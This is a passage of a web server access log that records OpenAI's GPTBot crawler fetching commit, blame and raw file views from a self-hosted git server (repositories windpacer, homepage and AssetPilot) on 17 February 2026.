+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10221] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322705] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10220] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10219] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10157] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10181] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322702] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322701] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:15:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fjs" [Client 74.7.227.38] [Length 43400] [Gzip 8.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" -[17/Feb/2026:15:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10416] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" -[17/Feb/2026:15:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10416] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" -[17/Feb/2026:15:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10413] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" -[17/Feb/2026:15:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10383] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" -[17/Feb/2026:15:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11279] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" -[17/Feb/2026:15:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json?display=source" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" -[17/Feb/2026:15:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" -[17/Feb/2026:15:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11278] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" -[17/Feb/2026:15:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" -[17/Feb/2026:15:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" -[17/Feb/2026:15:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11864] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" -[17/Feb/2026:15:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" -[17/Feb/2026:15:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json?display=source" [Client 74.7.227.38] [Length 11037] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" -[17/Feb/2026:15:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11280] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" -[17/Feb/2026:15:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" -[17/Feb/2026:15:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" -[17/Feb/2026:15:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11279] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" -[17/Feb/2026:15:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10853] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:15:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" -[17/Feb/2026:15:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" -[17/Feb/2026:15:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" -[17/Feb/2026:15:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" -[17/Feb/2026:15:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11038] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11069] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 15634] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" -[17/Feb/2026:15:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] 